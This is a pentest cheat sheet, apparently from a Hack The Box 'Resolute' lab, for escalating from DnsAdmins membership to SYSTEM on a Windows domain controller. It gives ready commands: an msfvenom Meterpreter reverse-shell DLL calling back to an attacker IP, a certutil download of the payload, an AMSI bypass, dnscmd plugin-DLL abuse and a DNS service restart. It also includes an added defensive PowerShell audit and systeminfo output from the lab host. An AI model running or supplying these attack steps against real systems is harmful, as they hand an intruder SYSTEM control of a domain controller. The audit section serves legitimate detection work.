DNS Admin to SYSTEM
# Check User
net user {username} /domain
# Generate DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64 LHOST=10.10.14.40 LPORT=9001 -f dll > mp64.dll
# Copy the evil DLL to the victim
certutil -urlcache -split -f http://10.10.14.40:8000/mp64.dll
# Verify the plugin DLL setting (this registry value is populated by the dnscmd step below; an empty value is the default)
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
# Abuse DNS with dnscmd
Now that the DLL is on the target and we have checked that it works, we can configure the victim DC01 to load our malicious DLL (from the attacker-controlled network share on host 10.0.0.2, or from a local path as in the example below) the next time the DNS service starts (or when the attacker restarts it):
dnscmd {victim} /config /serverlevelplugindll {Path of the DLL}
Example:
dnscmd resolute /config /serverlevelplugindll C:\Users\ryan\Documents\mp64.dll
# Getting code execution with NT\SYSTEM
The next time the DNS service starts, our malicious DLL should be loaded into the dns.exe process (which runs as SYSTEM) and a reverse shell should be sent back to our attacking system, so let's restart the DNS service:
sc.exe \\10.10.10.169 stop dns
sc.exe \\10.10.10.169 start dns
# Putting it all together
Bypass-4MSI
certutil -urlcache -split -f http://10.10.14.40:8000/mp64.dll
dnscmd resolute /config /serverlevelplugindll C:\Users\ryan\Documents\mp64.dll
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
sc.exe \\10.10.10.169 stop dns
sc.exe \\10.10.10.169 start dns
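From the defender's side, the same registry value and group membership are the things to audit. The script below is an added example, not part of the original write-up: it runs read-only on a DNS server (typically the DC), reports a non-empty ServerLevelPluginDll, lists who is in DnsAdmins, and looks for recent process-creation events whose command line referenced the setting. The function name Test-DnsPluginDll is hypothetical, and it assumes the ActiveDirectory module and command-line auditing for Security event 4688 are available.

```powershell
# Added defensive audit (not from the original page). Hypothetical function name.
function Test-DnsPluginDll {
    [CmdletBinding()]
    param([int]$LookbackDays = 7)

    $findings = @()
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    $value = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll

    # 1. The value itself. On a default DNS server it is absent or empty.
    if ([string]::IsNullOrEmpty($value)) {
        $findings += 'OK: ServerLevelPluginDll is not set.'
    } else {
        $findings += "ALERT: ServerLevelPluginDll is set to '$value'."
        if ($value -like '\\*') {
            $findings += 'ALERT: plugin path is a UNC share; dns.exe will fetch it over the network as SYSTEM.'
        }
        if (Test-Path -LiteralPath $value) {
            $sig = Get-AuthenticodeSignature -FilePath $value
            $findings += "Signature: $($sig.Status) $($sig.SignerCertificate.Subject)"
            $findings += "SHA256: $((Get-FileHash -Path $value -Algorithm SHA256).Hash)"
        } else {
            $findings += 'Plugin path does not exist on this host (stale entry or remote share).'
        }
    }

    # 2. Who can set this value without being Domain Admin: members of DnsAdmins.
    try {
        $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive -ErrorAction Stop |
            Select-Object -ExpandProperty SamAccountName
        $findings += "DnsAdmins members (each can load a DLL into dns.exe): $($members -join ', ')"
    } catch {
        $findings += 'Could not enumerate DnsAdmins (ActiveDirectory module unavailable?).'
    }

    # 3. Process creations whose command line touched the setting (assumes 4688 with
    #    command-line logging enabled; Sysmon EventID 1 would carry the same string).
    $since  = (Get-Date).AddDays(-$LookbackDays)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'serverlevelplugindll' }
    foreach ($e in $events) {
        $cmd = ($e.Message -split "`n" | Where-Object { $_ -match 'Process Command Line' }) -join ' '
        $findings += "ALERT: $($e.TimeCreated) 4688 referenced serverlevelplugindll: $($cmd.Trim())"
    }
    return $findings
}

Test-DnsPluginDll
```

Remediation after a positive finding is to remove the registry value and restart the DNS service, then review the DnsAdmins membership, since anyone in that group can set the value again.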
# This worked on HackTheBox: Resolute
C:\Windows\system32>systeminfo
systeminfo
Host Name: RESOLUTE
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA312
Original Install Date: 9/25/2019, 10:17:51 AM
System Boot Time: 1/19/2020, 1:49:19 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,177 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,578 MB
Virtual Memory: In Use: 853 MB
Page File Location(s): C:\pagefile.sys
Domain: megabank.local
Logon Server: N/A
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB4512574
[03]: KB4520724
[04]: KB4525236
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.169
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Note: This worked flawlessly on HackTheBox: Resolute